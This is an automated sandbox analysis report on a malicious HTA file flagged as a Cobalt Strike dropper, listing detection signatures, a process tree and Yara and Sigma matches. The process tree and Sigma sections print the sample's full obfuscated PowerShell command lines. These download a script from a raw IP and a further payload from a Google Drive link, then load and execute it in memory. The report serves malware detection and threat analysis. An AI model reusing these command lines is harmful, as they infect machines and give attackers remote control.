Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seethebestthingstobegoodwithhislifebestthigns.hta

Overview

General Information

Sample name:seethebestthingstobegoodwithhislifebestthigns.hta
Analysis ID:1541928
MD5:0b1aa8ae190d05df71f4052fae67df5b
SHA1:f6fe29f3e7830b15e3b244ba83216c029dcb60fb
SHA256:4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 5260 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestthingstobegoodwithhislifebestthigns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4432 cmdline: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp" "c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7336 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7408INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4ba53:$b2: ::FromBase64String(
  • 0x4c02d:$b2: ::FromBase64String(
  • 0x4cc23:$b2: ::FromBase64String(
  • 0x4de92:$b2: ::FromBase64String(
  • 0x4e56c:$b2: ::FromBase64String(
  • 0x4ee69:$b2: ::FromBase64String(
  • 0x4f4e6:$b2: ::FromBase64String(
  • 0x52876:$b2: ::FromBase64String(
  • 0x53650:$b2: ::FromBase64String(
  • 0x3112c:$b3: ::UTF8.GetString(
  • 0x31c36:$b3: ::UTF8.GetString(
  • 0x32502:$b3: ::UTF8.GetString(
  • 0x32fbd:$b3: ::UTF8.GetString(
  • 0x50416:$b3: ::UTF8.GetString(
  • 0x50ce2:$b3: ::UTF8.GetString(
  • 0x517cb:$b3: ::UTF8.GetString(
  • 0x52272:$b3: ::UTF8.GetString(
  • 0x77dc5:$b3: ::UTF8.GetString(
  • 0x78687:$b3: ::UTF8.GetString(
  • 0xadb20:$b3: ::UTF8.GetString(
  • 0xae3e5:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 7592JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7592INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x66d72:$b2: ::FromBase64String(
    • 0x673b4:$b2: ::FromBase64String(
    • 0x702e9:$b2: ::FromBase64String(
    • 0x7094d:$b2: ::FromBase64String(
    • 0x72434:$b2: ::FromBase64String(
    • 0x8a5b1:$b2: ::FromBase64String(
    • 0x8b40f:$b2: ::FromBase64String(
    • 0x8c61e:$b2: ::FromBase64String(
    • 0x8cc6d:$b2: ::FromBase64String(
    • 0x93b56:$b2: ::FromBase64String(
    • 0xbbcfe:$b2: ::FromBase64String(
    • 0xd15ba:$b2: ::FromBase64String(
    • 0xd1c0e:$b2: ::FromBase64String(
    • 0xd2491:$b2: ::FromBase64String(
    • 0xd2c9a:$b2: ::FromBase64String(
    • 0xd4eb8:$b2: ::FromBase64String(
    • 0x1844eb:$b2: ::FromBase64String(
    • 0x186a43:$b2: ::FromBase64String(
    • 0x187090:$b2: ::FromBase64String(
    • 0x18cb15:$b2: ::FromBase64String(
    • 0x18dd15:$b2: ::FromBase64String(

    Other

    SourceRuleDescriptionAuthorStrings
    amsi32_4432.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
      amsi32_7592.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2Fy
        Sigma detected: Potential PowerShell Command Line Obfuscation
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0T
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 